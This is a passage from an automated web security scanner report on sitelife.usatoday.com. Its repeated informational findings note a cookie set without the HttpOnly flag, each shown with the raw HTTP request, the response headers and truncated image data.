Last-Modified: Wed, 31 Aug 2011 20:33:28 GMT
Accept-Ranges: bytes
ETag: "d856eb3d1d68cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

GIF89a:.:....................................................................................................!.......,....:.:.... $.di.h..l..p,.tm... .....p.x..GE. .%..(Rph......`ZU...X.~M...p6-..q.M.
...[SNIP]...

14.84. http://sitelife.usatoday.com/ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 1460
Content-Type: image/jpeg
Last-Modified: Sat, 03 Sep 2011 20:44:32 GMT
Accept-Ranges: bytes
ETag: "fb14af487a6acc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

14.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 6118
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "469381b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR....... .......<.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..].T.W........@..."DAl@Q...8    .#j61.Dg49g&c.d..3....d..d...1N.D..y.w....c...8.@.FA...AE%.l.Q....._U......N.:U..._.W...{.
...[SNIP]...

14.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-background.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 202
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "469381b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...lIDATx....    .0..AY..8P.
..].a.3%l.Ww.......D.....J..M    ......r........ 3...... .........2c................O.......l......IEND.B
...[SNIP]...

14.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 386
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "a1f583b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.......................................................................................................|~.lmn.......................................fff...........................................
...[SNIP]...

14.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 386
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "a1f583b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.......................................................................................................|~.lmn.......................................fff...........................................
...[SNIP]...

14.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 657
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "a1f583b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a..................................................................................................................................................................................................
...[SNIP]...

14.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-avatar-blocked.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-blocked.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 939
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "b21c8bb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a(.(...................................vv.nn................mm..................................rr..........nn..........{{...................................................................mm....
...[SNIP]...

14.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 643
Content-Type: image/jpeg
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "b21c8bb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...........Q...................    ...    .......

.

.......................................................................................
...[SNIP]...

14.92. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 1448
Content-Type: image/jpeg
Last-Modified: Wed, 31 Aug 2011 20:15:32 GMT
Accept-Ranges: bytes
ETag: "1da43bc1a68cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...r...3...V...................    ...    .......

.

.......................................................................................
...[SNIP]...

14.93. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-primary-button-left.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-left.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 638
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<... IDATx....k.A...g....$.)..A...X.....7.XY..cmsDm..!(.Q....5....+b.r....Yg..]1..O...,<.fv.../=..w.u.@.j.kw....E....XEQ$......    Y.
...[SNIP]...

14.94. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-primary-button-right.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-right.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 440
Content-Type: image/png
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

.PNG
.
...IHDR..............L_.....tEXtSoftware.Adobe ImageReadyq.e<...ZIDATx.tQ.JBA.=3.7$...=(......hQH....h.......6.I.P[w."Zd..LA....z......:.....g....;...A*iq..)W...Z.l#}i..6..sX.....aN...i.ABa.
...[SNIP]...

14.95. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 587
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a........................N..Q..R..T..T..U..V..X..W..W..W..Z..X..\..[..\..\..\..]..^..d...............................................P..X..b....................W.....B..U..]..y...................
...[SNIP]...

14.96. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 607
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "d7f8db51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a.....Y...........kk...................AA.]].33...................ii................[[..........ss...................ee....??..........QQ.WW.==.UU.//..........##...................aa.ww.......OO.
...[SNIP]...

14.97. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 229
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "68e18fb51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

GIF89a.......................................................................................................!.......,..........b &.W9..e........u.e>.H...Y.RJ..GWeAP8.:S%@XX...r@`x.`...G...z.v(...|N
